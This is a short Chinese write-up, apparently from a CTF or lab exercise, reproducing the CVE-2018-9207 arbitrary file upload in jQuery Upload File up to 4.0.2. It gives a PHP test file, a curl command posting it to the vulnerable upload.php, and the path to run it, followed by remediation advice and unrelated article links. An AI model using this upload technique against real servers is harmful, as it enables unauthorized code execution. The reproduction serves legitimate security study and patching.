jquery 文件上传 (CVE-2018-9207)漏洞复现

0x01 漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file

0x02 影响范围

<= 4.0.2

0x03 漏洞复现

1、进入的页面

2、准备一个 php 文件

php 复制代码
<?php phpinfo(); ?>

3、通过虚拟机上传(把文件放进虚拟机里,并执行以下命令)

bash 复制代码
curl -F "myfile=@sh.php" "http://ip:端口/jquery-upload-file/php/upload.php"

4、浏览器访问路径

http://ip:port/jquery-upload-file/php/uploads/sh.php

Ctrl + F 搜 flag 关键字,即可获得 flag

0x04 漏洞修复

升级 jQuery File Upload 到官方安全版本(推荐 10.x 或至少 9.22.1+)

删除或禁用官方 demo 中不安全的上传处理代码(如 server/php/)

服务端限制上传文件类型,禁止上传可执行脚本(如 .php, .jsp 等)

上传接口必须设置身份认证或权限控制,禁止未授权访问

相关推荐
二饭1 天前
POI操作Docx的踩坑指南(一)
java·apache
Faith_xzc3 天前
Apache Doris 内部数据裁剪与过滤机制的实现原理
apache
Trainer21073 天前
十分钟搭建thinkphp开发框架
php·apache·phpstorm·composer
syntaxseeker3 天前
Apache Beam入门教程:统一批流处理模型
其他·apache
Full Stack Developme3 天前
Java 工具类 Hutool、Guava 与 Apache Commons 的区别
java·apache·guava
忆~遂愿3 天前
谷歌云+Apache Airflow,数据处理自动化的强力武器
人工智能·python·深度学习·opencv·自动化·apache
悟能不能悟3 天前
什么是 Apache Ignite?
apache
二饭3 天前
Apache POI操作Docx文档时踩坑指南
apache
fangeqin3 天前
解决django.db.utils.OperationalError: attempt to write a readonly database错误
django·apache·sqlite3·selinux
RunningShare4 天前
云原生时代的数据流高速公路:深入解剖Apache Pulsar的架构设计哲学
大数据·中间件·apache·pulsar